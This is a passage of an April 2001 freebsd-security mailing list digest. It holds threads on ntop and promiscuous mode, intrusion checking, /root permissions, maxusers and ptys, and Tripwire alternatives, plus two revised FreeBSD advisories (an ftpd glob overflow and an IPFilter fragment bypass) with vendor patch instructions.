14qEtq-0006Fk-00 for ; Thu, 19 Apr 2001 15:55:10 +0200 Date: Thu, 19 Apr 2001 15:55:10 +0200 From: Szilveszter Adam To: freebsd-security@freebsd.org Subject: Re: more on promiscuity Message-ID: <20010419155510.B23800@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:52:50AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 08:52:50AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > Ntop, I assume, will enable ? > How do I disable once it is enabled ? > > George Quit ntop?:-) -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 6:55:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 8EAD937B422 for ; Thu, 19 Apr 2001 06:55:37 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 3A16113614; Thu, 19 Apr 2001 09:55:37 -0400 (EDT) Date: Thu, 19 Apr 2001 09:55:37 -0400 From: Chris Faulhaber To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: more on promiscuity Message-ID: <20010419095536.B81766@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , George.Giles@mcmail.vanderbilt.edu, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dTy3Mrz/UPE2dbVg" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:52:50AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --dTy3Mrz/UPE2dbVg Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 08:52:50AM -0500, George.Giles@mcmail.vanderbilt.ed= u wrote: > Ntop, I assume, will enable ? > How do I disable once it is enabled ? >=20 It will be disabled when the program terminates (you should have both enabled and disabled entries in your logs) --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --dTy3Mrz/UPE2dbVg Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjre7lgACgkQObaG4P6BelBFSgCfSU1ynoNgimaPDIV40Rniane9 ccEAniYCa65MmUyiSqczSvDqcNtwfJ89 =emTM -----END PGP SIGNATURE----- --dTy3Mrz/UPE2dbVg-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 7:58:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from kottan-labs.bgsu.edu (kottan-labs.bgsu.edu [129.1.133.123]) by hub.freebsd.org (Postfix) with ESMTP id 4551937B43C for ; Thu, 19 Apr 2001 07:58:47 -0700 (PDT) (envelope-from memphis_ms@gmx.net) Received: (qmail 14009 invoked from network); 19 Apr 2001 11:00:41 -0400 Received: from m133-122.bgsu.edu (HELO gmx.net) (129.1.133.122) by kottan-labs.bgsu.edu with RC4-MD5 encrypted SMTP; 19 Apr 2001 11:00:41 -0400 Message-ID: <3ADEFE00.812EA0A3@gmx.net> Date: Thu, 19 Apr 2001 11:02:24 -0400 From: Raoul Schroeder X-Mailer: Mozilla 4.74 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190241.AA00733@fukuda.alles.ad.jp> <20010418200223.A42227@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Take your system off the net and check it for signs of intrusion. > > Kris Just a quick question: How does one check for signs of intrusion. The FreeBSD handbook does not really talk a lot about this. Is there a good documentation about this? Thank you Raoul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 8:41:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from aes.thinksec.com (aes.thinksec.com [193.212.248.16]) by hub.freebsd.org (Postfix) with ESMTP id 0A39B37B422 for ; Thu, 19 Apr 2001 08:41:48 -0700 (PDT) (envelope-from des@thinksec.com) Received: (from des@localhost) by aes.thinksec.com (8.11.3/8.11.3) id f3JFfl501538; Thu, 19 Apr 2001 15:41:47 GMT (envelope-from des@thinksec.com) X-Authentication-Warning: aes.thinksec.com: des set sender to des@thinksec.com using -f X-URL: http://www.ofug.org/~des/ To: Raoul Schroeder Cc: Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190241.AA00733@fukuda.alles.ad.jp> <20010418200223.A42227@xor.obsecurity.org> <3ADEFE00.812EA0A3@gmx.net> From: Dag-Erling Smorgrav Date: 19 Apr 2001 17:41:46 +0200 In-Reply-To: Raoul Schroeder's message of "Thu, 19 Apr 2001 11:02:24 -0400" Message-ID: Lines: 10 User-Agent: Gnus/5.0807 (Gnus v5.8.7) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Raoul Schroeder writes: > Just a quick question: How does one check for signs of intrusion. The Fre= eBSD > handbook does not really talk a lot about this. > Is there a good documentation about this? http://www.porcupine.org/ DES --=20 Dag-Erling Sm=F8rgrav - des@thinksec.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 8:45:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from dt051n37.san.rr.com (dt051n37.san.rr.com [204.210.32.55]) by hub.freebsd.org (Postfix) with ESMTP id 212AC37B424 for ; Thu, 19 Apr 2001 08:45:32 -0700 (PDT) (envelope-from DougB@DougBarton.net) Received: from DougBarton.net (master [10.0.0.2]) by dt051n37.san.rr.com (8.9.3/8.9.3) with ESMTP id IAA30868; Thu, 19 Apr 2001 08:45:29 -0700 (PDT) (envelope-from DougB@DougBarton.net) Message-ID: <3ADF0819.B5882BE1@DougBarton.net> Date: Thu, 19 Apr 2001 08:45:29 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.77 [en] (X11; U; FreeBSD 4.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Gerhard Sittig Cc: freebsd-security@FreeBSD.ORG Subject: Re: /root and users home dir permissions References: <20010418173927.A64529@icon.icon.bg> <20010418210425.S20830@speedy.gsinet> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gerhard Sittig wrote: > > On Wed, Apr 18, 2001 at 17:39 +0300, Victor Ivanov wrote: > > > > I noticed /root is installed with mode=0755 (and updated every > > time by installworld). It's the root home directory... some > > admins (like me) are using it for keeping sensitive data away > > from regular users. Shouldn't it be mode=0700 in > > /etc/mtree/BSD.root.dist? > > a+rx on /root only means that this very directory can be listed > and entered by anybody. There might be valid reasons for doing > this . . . > What keeps you from putting sensitive data into a directory one > level deeper? I agree. 755 for home dirs has a long standing tradition behind it, and is very useful in shared environments. Anything that needs to be hidden can be, in /root or elsewhere. Doug -- "One thing they don't tell you about doing experimental physics is that sometimes you must work under adverse conditions ... like a state of sheer terror." -- W. K. Hartmann Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 8:50:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from caerulus.cerintha.com (caerulus.cerintha.com [207.18.92.26]) by hub.freebsd.org (Postfix) with ESMTP id C0E5F37B42C for ; Thu, 19 Apr 2001 08:49:58 -0700 (PDT) (envelope-from scheidell@Cerintha.com) Received: (from scheidell@localhost) by caerulus.cerintha.com (8.11.3/8.11.3) id f3JFnqF74867; Thu, 19 Apr 2001 11:49:52 -0400 (EDT) Date: Thu, 19 Apr 2001 11:49:52 -0400 (EDT) From: Michael S Scheidell Message-Id: <200104191549.f3JFnqF74867@caerulus.cerintha.com> To: memphis_ms@gmx.net Cc: freebsd-security@freebsd.org Subject: Re: unknown process In-Reply-To: <3ADEFE00.812EA0A3@gmx.net> References: <200104190241.AA00733@fukuda.alles.ad.jp> <20010418200223.A42227@xor.obsecurity.org> <3ADEFE00.812EA0A3@gmx.net> Reply-To: scheidell@fdma.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In local.freebsd.security, you wrote: >> >> Take your system off the net and check it for signs of intrusion. >> >> Kris > >Just a quick question: How does one check for signs of intrusion. The FreeBSD >handbook does not really talk a lot about this. >Is there a good documentation about this? > see my sig below: -- Michael Scheidell Florida Datamation, Inc. scheidell@fdma.com 1+(561) 368-9561 Internet Security and Consulting See updated IT Security News at http://www.fdma.com/ After system Compromise : http://www.cert.org/tech_tips/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 9:36:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.24.102.10]) by hub.freebsd.org (Postfix) with ESMTP id 5DE5737B422 for ; Thu, 19 Apr 2001 09:36:29 -0700 (PDT) (envelope-from buliwyf@libertad.univalle.edu.co) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by mafalda.univalle.edu.co (8.11.3/8.11.3) with ESMTP id f3JGa5u10303 for ; Thu, 19 Apr 2001 11:36:05 -0500 (GMT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id f3JGd1I30446 for ; Thu, 19 Apr 2001 11:39:03 -0500 (COT) Date: Thu, 19 Apr 2001 11:39:01 -0500 (COT) From: Buliwyf McGraw To: security@FreeBSD.ORG Subject: maxusers Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, im recompiling the kernel of my server, because a need more pty's I set maxusers var to 1024, when i do the config i get this: [117][11:25][Xr00t]%config CROW warning: maxusers > 512 (1024) Don't forget to do a ``make depend'' That warning is about security or some risk for the system? Thanks. ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 9:45:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 0940937B727 for ; Thu, 19 Apr 2001 09:45:30 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id 0193513706; Thu, 19 Apr 2001 09:48:06 -0700 (PDT) Message-ID: <00e201c0c8f0$7aa95d80$4904a8c0@epylon.lan> From: "Jason DiCioccio" To: "Buliwyf McGraw" , References: Subject: Re: maxusers Date: Thu, 19 Apr 2001 09:47:53 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 pseudo-device pty 256 and then do your MAKEDEVs... 256 is the max amount of ptys you'll get :) Cheers, - -JD- - ----- Original Message ----- From: "Buliwyf McGraw" To: Sent: Thursday, April 19, 2001 9:39 AM Subject: maxusers > > Hi, im recompiling the kernel of my server, because a need more > pty's > I set maxusers var to 1024, when i do the config i get this: > > [117][11:25][Xr00t]%config CROW > warning: maxusers > 512 (1024) > Don't forget to do a ``make depend'' > > That warning is about security or some risk for the system? > > Thanks. > > ==================================================================== > === > Buliwyf McGraw > Administrador del Servidor Libertad > Centro de Servicios de Informacion > Universidad del Valle > ==================================================================== > === > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use iQA/AwUBOt8WtVCmU62pemyaEQIExgCeJkIZ4Pt3MRvJ6GXrTQM/xnuw48cAoIEw Id8MKQyKlKaauzqq+fwAwk40 =2hJP -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 10:49:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id E549537B42C for ; Thu, 19 Apr 2001 10:49:11 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id TAA33685; Thu, 19 Apr 2001 19:48:43 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: maxusers References: From: Dag-Erling Smorgrav Date: 19 Apr 2001 19:48:42 +0200 In-Reply-To: Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Buliwyf McGraw writes: > Hi, im recompiling the kernel of my server, because a need more pty's > I set maxusers var to 1024, when i do the config i get this: There is no relation between maxusers and the number of ptys available. In fact, there is practically no relation between maxusers and anything of interest in the kernel. I believe the only value affected by maxusers that can't be tuned at boot- or run-time is the maximum size of the process table. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 10:58: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg001.cms.usa.net (urdvg001.cms.usa.net [165.212.11.1]) by hub.freebsd.org (Postfix) with SMTP id BD1AE37B423 for ; Thu, 19 Apr 2001 10:57:56 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 23621 invoked from network); 19 Apr 2001 17:57:55 -0000 Received: from uadvg129.cms.usa.net (165.212.11.129) by corprelay.cms.usa.net with SMTP; 19 Apr 2001 17:57:55 -0000 Received: (qmail 19260 invoked by uid 0); 19 Apr 2001 17:57:55 -0000 Received: USA.NET MXFirewall, messaging filters applied; Thu, 19 Apr 2001 17:57:54 GMT Received: from packeteer.com [207.78.98.2] by uadvg129 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 365FDsR6z0319M20; Thu, 19 Apr 2001 17:57:51 GMT Message-ID: <3ADF2757.DF2C0A88@packeteer.com> Date: Thu, 19 Apr 2001 10:58:47 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: maxusers Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 19 Apr 2001, Dag-Erling Smorgrav wrote: > There is no relation between maxusers and the number of ptys > available. In fact, there is practically no relation between maxusers > and anything of interest in the kernel. I believe the only value > affected by maxusers that can't be tuned at boot- or run-time is the > maximum size of the process table. Would it be a horrible idea to change the name of the key in the config file? Maybe to something less likely to cause this (very common and understandable) error-- like, say, RSRCLIM (resource limit)? Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:12:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D10F737B423; Thu, 19 Apr 2001 12:11:55 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f3JJBt338327; Thu, 19 Apr 2001 12:11:55 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Thu, 19 Apr 2001 12:11:55 -0700 (PDT) Message-Id: <200104191911.f3JJBt338327@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob [REVISED] Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:33 Security Advisory FreeBSD, Inc. Topic: globbing vulnerability in ftpd [REVISED] Category: core Module: ftpd/libc Announced: 2001-04-17 Revised: 2001-04-19 Credits: John McDonald and Anthony Osborne, COVERT Labs Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), FreeBSD 3.5-STABLE and 4.3-RC prior to the correction date. Corrected: 2001-04-17 (FreeBSD 4.3-RC) 2001-04-17 (FreeBSD 3.5-STABLE) Vendor status: Corrected FreeBSD only: NO 0. Revision History 2001-04-17 v1.0 Initial release 2001-04-19 v1.1 Corrected patch and patch instructions I. Background Numerous FTP daemons, including the daemon distributed with FreeBSD, use server-side globbing to expand pathnames via user input. This globbing is performed by FreeBSD's glob() implementation in libc. II. Problem Description The glob() function contains potential buffer overflows that may be exploitable through the FTP daemon. If a directory with a name of a certain length is present, a remote user specifying a pathname using globbing characters may cause arbitrary code to be executed on the FTP server as user running ftpd, usually root. Additionally, when given a path containing numerous globbing characters, the glob() functions may consume significant system resources when expanding the path. This can be controlled by setting user limits via /etc/login.conf and setting limits on globbing expansion. All versions of FreeBSD prior to the correction date, including FreeBSD 3.5.1 and 4.2 contain this problem. The base system that will ship with FreeBSD 4.3 does not contain this problem since it was corrected before the release. III. Impact Remote users may be able to execute arbitrary code on the FTP server as the user running ftpd, usually root. The FTP daemon supplied with FreeBSD is enabled by default to allow access to authorized local users and not anonymous users, thus limiting the impact to authorized local users. IV. Workaround If the FTP daemon is executed from inetd, disable the FTP daemon by commenting out the ftp line in /etc/inetd.conf, then reload the inetd configuration by executing the following command as root: # killall -HUP inetd V. Solution One of the following: 1) Upgrade to FreeBSD 4.3-RC or 3.5.1-STABLE after the correction date. 2) Download the patch and detached PGP signature from the following location: The following patch applies to FreeBSD 4.x: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch.asc The following patch applies to FreeBSD 3.x: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch.asc Verify the detached signature using your PGP utility. Issue the following commands as root: # cd /usr/src # patch -p < /path/to/patch # cp /usr/src/include/glob.h /usr/include/ # cd /usr/src/lib/libc # make all install # cd /usr/src/libexec/ftpd # make all install If the FTP daemon is running standalone, it will have to be manually stopped and restarted. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOt83elUuHi5z0oilAQGvLwP+Mg6yScJhgTuGnJ1037opvwPEbKb0JWF4 CuC8lKB0xV3BMQhQ8BRC3RVJWptFDv8qlWxW7kCyiuYk19oS8IUsllvwD6uftHZI iph5TF3F37DNiE2lEp4T5/VSPqkEaYoV0Iu9+S43V7M2dPWVPS4tziPQamtBupdQ OhsFSsEGgVU= =AV6T -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:21: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id 3F05437B42C for ; Thu, 19 Apr 2001 12:21:05 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f3JJK6P94257 for ; Thu, 19 Apr 2001 14:20:06 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 19 Apr 2001 14:20:01 -0500 (CDT) From: Chris Byrnes To: Subject: RE: Security, glob FTP, new fix Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org awww# make all install cc -O -pipe -DSETPROCTITLE -DSKEY -DLOGIN_CAP -DVIRTUAL_HOSTING -Wall -DINET6 -Dmain=ls_main -I/usr/src/libexec/ftpd/../../bin/ls -c /usr/src/libexec/ftpd/ftpd.c /usr/src/libexec/ftpd/ftpd.c: In function `send_file_list': /usr/src/libexec/ftpd/ftpd.c:2645: warning: variable `dout' might be clobbered by `longjmp' or `vfork' /usr/src/libexec/ftpd/ftpd.c:2646: warning: variable `dirlist' might be clobbered by `longjmp' or `vfork' /usr/src/libexec/ftpd/ftpd.c:2647: warning: variable `simple' might be clobbered by `longjmp' or `vfork' /usr/src/libexec/ftpd/ftpd.c:2648: warning: variable `freeglob' might be clobbered by `longjmp' or `vfork' yacc -o ftpcmd.c /usr/src/libexec/ftpd/ftpcmd.y cc -O -pipe -DSETPROCTITLE -DSKEY -DLOGIN_CAP -DVIRTUAL_HOSTING -Wall -DINET6 -Dmain=ls_main -I/usr/src/libexec/ftpd/../../bin/ls -c ftpcmd.c /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse': /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is reported only once /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.) *** Error code 1 Stop in /usr/src/libexec/ftpd. awww# Still broken. Chris Byrnes, chris@JEAH.net JEAH Communications, http://www.JEAH.net 608.244.9525 (Toll), 1.866.AWW.JEAH (Toll-Free) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:24:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB9A937B722; Thu, 19 Apr 2001 12:23:53 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f3JJNrP39589; Thu, 19 Apr 2001 12:23:53 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Thu, 19 Apr 2001 12:23:53 -0700 (PDT) Message-Id: <200104191923.f3JJNrP39589@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:32.ipfilter [REVISED] Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:32 Security Advisory FreeBSD, Inc. Topic: IPFilter may incorrectly pass packets [REVISED] Category: core Module: IPFilter Announced: 2001-04-16 Revised: 2001-04-19 Credits: Thomas Lopatic Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), FreeBSD 3.5-STABLE, and 4.2-STABLE prior to the correction date. Corrected: 2001-04-07 (FreeBSD 4.2-STABLE) Vendor status: Corrected FreeBSD only: NO 0. Revision History v1.0 2001-04-16 Initial release v1.1 2001-04-19 Corrected patch location I. Background IPFilter is a multi-platform packet filtering package. II. Problem Description When matching a packet fragment, insufficient checks were performed to ensure the fragment is valid. In addition, the fragment cache is checked before any rules are checked. Even if all fragments are blocked with a rule, fragment cache entries can be created by packets that match currently held state information. Because of these discrepancies, certain packets may bypass filtering rules. All versions of FreeBSD prior to the correction date, including FreeBSD 3.5.1 and 4.2, contain this problem. The base system that will ship with FreeBSD 4.3 does not contain this problem since it was corrected during the beta cycle before the release. III. Impact Malicious remote users may be able to bypass filtering rules, allowing them to potentially circumvent the firewall. IPFilter is not enabled by default. If you have not enabled IPFilter, your system is not vulnerable to this problem. IV. Workaround Since fragment cache matching occurs before filtering rules checking, it is not possible to work around this problem using IPFilter rules. V. Solution [FreeBSD 3.x] Due to the age of the IPFilter package shipped with FreeBSD 3.x, it is recommended that FreeBSD 3.x systems update to IPFilter 3.4.17 using the package available from the authors website: http://coombs.anu.edu.au/~avalon/ip-filter.html [FreeBSD 4.x] One of the following: 1) Upgrade to FreeBSD 4.2-STABLE after the correction date. 2) Download the patch and detached PGP signature from the following location: The following patch applies to FreeBSD 4.1-RELEASE through 4.2-STABLE. # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:32/ipfilter.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:32/ipfilter.patch.asc Verify the detached signature using your PGP utility. Issue the following commands as root: # cd /usr/src # patch -p < /path/to/patch If the system is using ipfilter as a kernel module, the module may be rebuilt and installed and ipfilter rules reloaded with the following commands: # cd /usr/src/sys/modules/ipfilter # make all install # kldunload ipl && kldload ipf && ipf -Fa -f /etc/ipf.rules Otherwise, if ipfilter is compiled into the kernel, a new kernel will need to be compiled and installed and the system will have to be rebooted for the changes to take effect. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOt860lUuHi5z0oilAQF3YAP/QjuLc+e2gGAiuQSxfi9wE5Kw9Q4pYp66 SNFxhz1cvfg/zfCe81bM3+M/GYDAZEqrmWsfvObKXuU+8BCMeJ/C+Jifu+P6hO4K galMavQ5UTzwnw4lwK4VU/D7zefX5HHOXk0jb/Q6DFs/4KKIFCmGHoBYhuGKbwm0 soEQYwDEAps= =nkCa -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:30:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from kdmail.netcologne.de (kdmail.netcologne.de [194.8.194.80]) by hub.freebsd.org (Postfix) with ESMTP id 91D6F37B440 for ; Thu, 19 Apr 2001 12:30:46 -0700 (PDT) (envelope-from info@emre.de) Received: from emre.de ([195.14.235.202]) by kdmail.netcologne.de (Post.Office MTA v3.5.3 release 223 ID# 127-61375U6500L550S0V35) with ESMTP id de for ; Thu, 19 Apr 2001 21:30:44 +0200 Message-ID: <3ADF3CCC.FB8498DC@emre.de> Date: Thu, 19 Apr 2001 21:30:20 +0200 From: Emre Bastuz X-Mailer: Mozilla 4.75 [de] (Windows NT 5.0; U) X-Accept-Language: de MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Tripwire or the like for FreeBSD ? Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I was just wondering if there is Tripwire for FreeBSD or some decent tool that has similar/better functionality ? The Tripwire homepage seems to bee pretty commercial and lacks a BSD version (they seem to be focused on Linux). I found something called "Aide" in the ports directory, but to be honest - I don´t trust a "Version 0.7" when it comes to security. Does anyone know any alternative ? Regards, Emre -- Emre Bastuz info@emre.de http://www.emre.de UIN: 561260 PGP Key ID: 0xAFAC77FD To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 12:31:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 8F78437B43F for ; Thu, 19 Apr 2001 12:31:05 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id E3F5013614; Thu, 19 Apr 2001 15:31:04 -0400 (EDT) Date: Thu, 19 Apr 2001 15:31:04 -0400 From: Chris Faulhaber To: Chris Byrnes Cc: security@freebsd.org Subject: Re: Security, glob FTP, new fix Message-ID: <20010419153104.C81766@peitho.fxp.org> 